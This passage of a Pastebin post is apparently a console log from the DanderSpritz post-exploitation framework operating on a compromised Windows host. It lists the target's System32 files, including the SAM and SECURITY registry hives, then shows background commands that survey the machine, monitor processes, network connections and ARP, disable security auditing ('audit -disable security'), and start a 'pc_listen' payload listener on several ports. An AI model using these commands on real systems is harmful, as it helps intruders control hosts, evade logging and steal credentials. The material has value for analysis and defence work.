  846. | 2017-04-28 16:37:20 | 106316 | C:\Windows\System32 | perfc009.dat |
  847. | 2017-04-28 16:37:20 | 623940 | C:\Windows\System32 | perfh009.dat |
  848. | 2017-04-28 16:37:20 | 726316 | C:\Windows\System32 | PerfStringBackup.INI |
  849. | 2017-04-28 16:33:39 | 8192 | C:\Windows\System32\catroot2 | edb.chk |
  850. | 2017-04-28 16:33:39 | 65536 | C:\Windows\System32\catroot2 | edb.log |
  851. | 2017-04-28 16:33:39 | 1056768 | C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE} | catdb |
  852. | 2017-04-28 16:33:40 | 20193280 | C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} | catdb |
  853. | 2017-04-28 16:45:42 | 262144 | C:\Windows\System32\config | DEFAULT |
  854. | 2017-04-28 16:45:42 | 156672 | C:\Windows\System32\config | DEFAULT.LOG1 |
  855. | 2017-04-28 16:33:18 | 262144 | C:\Windows\System32\config | SAM |
  856. | 2017-04-28 16:33:17 | 21504 | C:\Windows\System32\config | SAM.LOG1 |
  857. | 2017-04-28 16:45:52 | 262144 | C:\Windows\System32\config | SECURITY |
  858. | 2017-04-28 16:45:52 | 21504 | C:\Windows\System32\config | SECURITY.LOG1 |
  859. | 2017-04-28 16:46:42 | 35389440 | C:\Windows\System32\config | SOFTWARE |
  860. | 2017-04-28 16:46:42 | 262144 | C:\Windows\System32\config | SOFTWARE.LOG1 |
  861. | 2017-04-28 16:47:39 | 11010048 | C:\Windows\System32\config | SYSTEM |
  862. | 2017-04-28 16:47:39 | 262144 | C:\Windows\System32\config | SYSTEM.LOG1 |
  863. | 2017-04-28 16:40:20 | <DIR> | C:\Windows\System32\LogFiles | Scm |
  864. | 2017-04-28 16:33:06 | 20 | C:\Windows\System32\LogFiles\Scm | 1ec9510d-a439-4950-9399-b6399edf9ea7 |
  865. | 2017-04-28 16:33:07 | 20 | C:\Windows\System32\LogFiles\Scm | 2c59ecaf-3a27-4640-9f4b-519b05bdd70f |
  866. | 2017-04-28 16:40:07 | 12 | C:\Windows\System32\LogFiles\Scm | 5b184694-64c3-4633-94c5-945b3fa561d6 |
  867. | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | 93e98122-6bf3-4fdc-aeca-74fad5c96233 |
  868. | 2017-04-28 16:33:20 | 12 | C:\Windows\System32\LogFiles\Scm | 9b75c702-ea13-406a-badb-6c588ee4375b |
  869. | 2017-04-28 16:40:07 | 12 | C:\Windows\System32\LogFiles\Scm | a1cfa52f-06f2-418d-addb-cd6456d66f43 |
  870. | 2017-04-28 16:40:09 | 12 | C:\Windows\System32\LogFiles\Scm | a6394592-54ce-4e93-8d64-1a068f462632 |
  871. | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | bba67ad0-4ba0-4b44-827b-ff419b70c057 |
  872. | 2017-04-28 16:46:22 | 12 | C:\Windows\System32\LogFiles\Scm | de8699d2-8a05-42f7-8a85-5162af47d26a |
  873. | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | de8bae53-2809-4f75-85ef-427d364b9b2c |
  874. | 2017-04-28 16:40:20 | 20 | C:\Windows\System32\LogFiles\Scm | def25c67-2829-4507-8c40-4111ae376e45 |
  875. | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | ea4f6189-e102-41e6-8fbb-5c10fc54a023 |
  876. | 2017-04-28 16:33:21 | 12 | C:\Windows\System32\LogFiles\Scm | f1369a11-e983-4458-b390-712efa1cba44 |
  877. | 2017-04-28 16:33:12 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTDiagLog.etl |
  878. | 2017-04-28 16:32:45 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventLog-Application.etl |
  879. | 2017-04-28 16:33:03 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventlog-Security.etl |
  880. | 2017-04-28 16:33:01 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventLog-System.etl |
  881. | 2017-04-28 16:35:23 | 0 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTMsMpPsSession7.etl |
  882. | 2017-04-28 16:33:16 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTUBPM.etl |
  883. | 2017-04-28 16:40:19 | <DIR> | C:\Windows\System32\Tasks\Microsoft | Windows Defender |
  884. | 2017-04-28 16:40:19 | 3856 | C:\Windows\System32\Tasks\Microsoft\Windows Defender | MP Scheduled Scan |
  885. | 2017-04-28 16:37:20 | <DIR> | C:\Windows\System32\wbem | Performance |
  886. | 2017-04-28 16:33:17 | <DIR> | C:\Windows\System32\wbem | Repository |
  887. | 2017-04-28 16:37:15 | 3444 | C:\Windows\System32\wbem\Performance | WmiApRpl.h |
  888. | 2017-04-28 16:37:20 | 28590 | C:\Windows\System32\wbem\Performance | WmiApRpl.ini |
  889. | 2017-04-28 16:45:46 | 4349952 | C:\Windows\System32\wbem\Repository | INDEX.BTR |
  890. | 2017-04-28 16:38:16 | 50152 | C:\Windows\System32\wbem\Repository | MAPPING2.MAP |
  891. | 2017-04-28 16:45:46 | 50152 | C:\Windows\System32\wbem\Repository | MAPPING3.MAP |
  892. | 2017-04-28 16:45:46 | 15425536 | C:\Windows\System32\wbem\Repository | OBJECTS.DATA |
  893. | 2017-04-28 16:34:55 | 37880 | C:\Windows\System32\wdi | BootPerformanceDiagnostics_SystemData.bin |
  894. | 2017-04-28 16:34:54 | <DIR> | C:\Windows\System32\wdi | {86432a0b-3c7d-4ddf-a89c-172faa90485d} |
  895. | 2017-04-28 16:34:53 | 4980736 | C:\Windows\System32\wdi\LogFiles | BootCKCL.etl |
  896. | 2017-04-28 16:32:47 | 212992 | C:\Windows\System32\wdi\LogFiles | WdiContextLog.etl.001 |
  897. | 2017-04-28 16:34:55 | 5342 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d} | S-1-5-21-3463664321-2923530833-3546627382-1000_UserData.bin |
  898. | 2017-04-28 16:34:54 | <DIR> | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d} | {577acaf2-2396-41ba-ba84-dfccf3d45721} |
  899. | 2017-04-28 16:32:47 | 212992 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{577acaf2-2396-41ba-ba84-dfccf3d45721} | snapshot.etl |
  900. | 2017-04-28 16:34:07 | 0 | C:\Windows\System32\wfp | wfpdiag.etl |
  901. | 2017-04-28 16:33:04 | 1118208 | C:\Windows\System32\winevt\Logs | Application.evtx |
  902. | 2017-04-28 16:33:06 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-BranchCacheSMB%%%%4Operational.evtx |
  903. | 2017-04-28 16:33:06 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Dhcpv6-Client%%%%4Admin.evtx |
  904. | 2017-04-28 16:34:57 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Diagnosis-DPS%%%%4Operational.evtx |
  905. | 2017-04-28 16:34:57 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Diagnostics-Performance%%%%4Operational.evtx |
  906. | 2017-04-28 16:33:06 | 1118208 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-GroupPolicy%%%%4Operational.evtx |
  907. | 2017-04-28 16:33:40 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-HomeGroup Provider Service%%%%4Operational.evtx |
  908. | 2017-04-28 16:33:04 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Kernel-WHEA%%%%4Operational.evtx |
  909. | 2017-04-28 16:36:36 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Known Folders API Service.evtx |
  910. | 2017-04-28 16:33:19 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-NetworkProfile%%%%4Operational.evtx |
  911. | 2017-04-28 16:33:05 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-OfflineFiles%%%%4Operational.evtx |
  912. | 2017-04-28 16:42:10 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-ReliabilityAnalysisComponent%%%%4Operational.evtx |
  913. | 2017-04-28 16:33:22 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Resource-Exhaustion-Detector%%%%4Operational.evtx |
  914. | 2017-04-28 16:33:22 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-TerminalServices-LocalSessionManager%%%%4Operational.evtx |
  915. | 2017-04-28 16:33:18 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-TerminalServices-RemoteConnectionManager%%%%4Operational.evtx |
  916. | 2017-04-28 16:33:19 | 1118208 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-User Profile Service%%%%4Operational.evtx |
  917. | 2017-04-28 16:35:21 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Windows Defender%%%%4WHC.evtx |
  918. | 2017-04-28 16:33:19 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Windows Firewall With Advanced Security%%%%4Firewall.evtx |
  919. | 2017-04-28 16:40:10 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-WindowsBackup%%%%4ActionCenter.evtx |
  920. | 2017-04-28 16:36:13 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-WindowsUpdateClient%%%%4Operational.evtx |
  921. | 2017-04-28 16:33:04 | 4263936 | C:\Windows\System32\winevt\Logs | Security.evtx |
  922. | 2017-04-28 16:33:02 | 3215360 | C:\Windows\System32\winevt\Logs | System.evtx |
  923. | 2017-04-28 16:33:06 | 6 | C:\Windows\Tasks | SA.DAT |
  924.  
  925. Command completed successfully
  926.  
  927. - [2017-04-28 09:52:59 z0.0.0.11] Commands currently running in the background:
  928. | ID | Target | Full Command | Sent | Received |
  929. +-----+-----------+--------------------------------------------------------------------------------------------------------+------+----------+
  930. | 145 | z0.0.0.11 | keepalive -delay 1m | 109 | 0 |
  931. | 214 | z0.0.0.11 | script Connected/Connected.dss | 0 | 0 |
  932. | 215 | z0.0.0.11 | python Connected/Connected.py -project Ops | 0 | 0 |
  933. | 230 | z0.0.0.11 | python survey.py -args " -run " | 0 | 0 |
  934. | 234 | z0.0.0.11 | background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s "processes -monitor " " | 0 | 0 |
  935. | 235 | z0.0.0.11 | background log=monitor guiflag=monitor processes -monitor | 236 | 966 |
  936. | 311 | z0.0.0.11 | stopaliasing dst=z0.0.0.11 audit -disable security | 152 | 14 |
  937. | 323 | z0.0.0.11 | netconnections -monitor | 175 | 439 |
  938. | 327 | z0.0.0.11 | arp -delay 10s -monitor | 169 | 382 |
  939.  
  940. Command completed successfully
  941.  
  942. Command completed successfully
  943.  
  944. Command completed successfully
  945.  
  946. Command completed successfully
  947. [16:52:59] Backgrounded 'pc_listen -key "Default" -payload "Danderspritz" -run "memlib" -tcp "443 80 53 1509" ' Id: 134
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!